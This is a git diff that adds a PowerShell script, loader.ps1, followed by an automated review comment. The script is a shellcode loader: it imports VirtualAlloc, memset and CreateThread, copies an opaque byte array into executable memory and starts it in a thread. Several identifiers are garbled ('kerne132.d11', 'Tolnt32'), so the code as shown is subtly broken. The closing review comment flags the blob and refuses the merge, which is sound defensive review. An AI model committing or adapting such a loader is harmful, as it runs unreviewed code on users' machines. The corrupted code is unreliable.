diff --git a/loader.ps1 b/loader.ps1
new file mode 100644
index 0000000..4bab2ab
--- /dev/null
+++ b/loader.ps1
@@ -0,0 +1,15 @@ +$pos= '[DllImport("kernel32.d11")] +public static extern IntPtr VirtualAlloc(IntPtr lpAddress, uint dwpysize, uint flAllocationType, uint flProtect);[DllImport("kerne132.d11")] +public static extern IntPtr CreateThread(IntPtr lpThreadAttributes, uint dwStackpysize, IntPtr lpStartAddress, IntPtr lpParameter, uint dwCreationFlags, IntPtr lpThreadId); +[DllImport("msvcrt.dll")] +public static extern IntPtr memset(IntPtr dest, uint src, uint count);'; + +$malFunc = Add-Type -memberDefinition $pos -Name 11Win32" -namespace Win32Functions -p assthru; +[Byte []]; +[Byte[]] $pyld = 0xda,0xd6,0xba,0x41,0xd8,0xb7,0x3e,0xd9,0x74,0x24,0xf4,0x5e,0x29,0xc9,0xb1,0x59,0x31,0x56,0x19,0x83,0xee,0xfc,0x3,0x56,0x15,0xa3,0x2d,0x4b,0xd6,0xac,0xce,0xb4,0x27,0xd2,0x47,0x51,0x16,0xc0,0x3c,0x11,0xb,0xd4,0x37,0x77,0xa0,0x9f,0x1a,0x6c,0xb7,0x28,0xd0,0xaa,0x4c,0x24,0xcd,0x83,0xad,0xf9,0xcd,0x48,0x6d,0x98,0xb1,0x92,0xa2,0x7a,0x8b,0x5c,0xb7,0x7b,0xcc,0x2a,0xbd,0x94,0x80,0xfb,0xb6,0x38,0x35,0x8f,0x8b,0x80,0x34,0x5f,0x80,0xb8,0x4e,0xda,0x57,0x4c,0xe3,0xe5,0x87,0x27,0xa3,0xc5,0x77,0xbc,0x1c,0x1e,0x79,0x11,0x19,0xd7,0xd,0xa9,0x6b,0xd9,0x12,0x5a,0x5f,0x92,0xec,0x8a,0x91,0x64,0x42,0xf3,0x1d,0x69,0x9a,0x34,0x99,0x92,0xe9,0x4e,0xd9,0x2f,0xea,0x95,0xa3,0xeb,0x7f,0x9,0x3,0x7f,0x27,0xed,0xb5,0xac,0xbe,0x66,0xb9,0x19,0xb4,0x20,0xde,0x9c,0x19,0x5b,0xda,0x15,0x9c,0x8b,0x6a,0x6d,0xbb,0xf,0x36,0x35,0xa2,0x16,0x92,0x98,0xdb,0x48,0x7a,0x44,0x7e,0x3,0x69,0x93,0xfe,0xec,0x71,0x9c,0xa2,0x7a,0xbd,0x51,0x5d,0x7a,0xa9,0xe2,0x2e,0x48,0x76,0x59,0xb9,0xe0,0xff,0x47,0x3e,0x71,0x17,0x78,0x90,0x39,0x78,0x86,0x11,0x39,0x50,0x4d,0x45,0x69,0xca,0x64,0xe6,0xe2,0xa,0x88,0x33,0x9e,0x0,0x1e,0x7c,0xf6,0x14,0xc7,0x14,0x4,0x17,0xf6,0x5f,0x81,0xf1,0xa8,0xcf,0xc1,0xad,0x8,0xa0,0xa1,0x1d,0xe1,0xaa,0x2e,0x41,0x11,0xd5,0xe5,0xea,0xb8,0x3a,0x53,0x42,0x55,0xa2,0xfe,0x18,0xc4,0x2b,0xd5,0x64,0xc6,0xa0,0xdf,0x99,0x89,0x40,0xaa,0x89,0xfe,0x36,0x54,0x52,0xff,0xd2,0x54,0x38,0xfb,0x74,0x3,0xd4,0x1,0xa0,0x63,0x7b,0xf9,0x87,0xf0,0x7c
,0x5,0x56,0xc0,0xf7,0x30,0xcc,0x6c,0x60,0x3d,0x0,0x6c,0x70,0x6b,0x4a,0x6c,0x18,0xcb,0x2e,0x3f,0x3d,0x14,0xfb,0x2c,0xee,0x81,0x4,0x4,0x42,0x1,0x6d,0xaa,0xbd,0x65,0x32,0x55,0xe8,0xf5,0x35,0xa9,0x6e,0xd2,0x9d,0xc1,0x90,0x62,0x1e,0x11,0xfb,0x62,0x4e,0x79,0xf0,0x4d,0x61,0x49,0xf9,0x47,0x2a,0xc1,0x70,0x6,0x98,0x70,0x84,0x3,0x7c,0x2c,0x85,0xa0,0xa5,0xdf,0xfc,0xc9,0x5a,0x20,0x1,0xc0,0x3e,0x21,0x1,0xec,0x40,0x1e,0xd7,0xd5,0x36,0x61,0xeb,0x61,0x48,0xd4,0x4e,0xc3,0xc3,0x16,0xdc,0x13,0xc6 +$pysize= 0x1000; +if ($pyld.Length -gt 0x1000) {$pysize = $pyld.Length}; +$z = $malFunc::VirtualAlloc(0,$pysize,0x3000,0x40); +for ($i=0;$i -le ($pyld.Length-1);$i++) {$malFunc::memset([IntPtr]($z.Tolnt32()+$i), $pyld +[$i], 1)} ; +$malFunc::CreateThread(0,0,$z,0,0,0);for (;;) { Start-sleep 60 };
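Review bot: The whole of loader.ps1 is an opaque byte array (`$pyld`) copied into a buffer obtained with `VirtualAlloc(0,$pysize,0x3000,0x40)` (0x40 is PAGE_EXECUTE_READWRITE) and then started with `$malFunc::CreateThread(0,0,$z,0,0,0)`, and neither the file nor the commit says what those bytes are, where they came from, or why a repository script should execute them. A raw byte blob cannot be reviewed, so this should not be merged as-is; if it is a deliberate sample for a detection or lab exercise, add a header comment stating that purpose and the sample's origin (e.g. `# Lab sample: opaque payload, origin <SOURCE-PLACEHOLDER>, run only in the isolated test VM`) and keep it in a labelled, quarantined sample location rather than as a runnable script at the repository root. Note also that the combination of Add-Type with DllImport of VirtualAlloc/CreateThread and a large inline byte array is exactly what PowerShell script-block logging and AMSI-backed endpoint controls alert on, so expect the file to be flagged and quarantined on any monitored host.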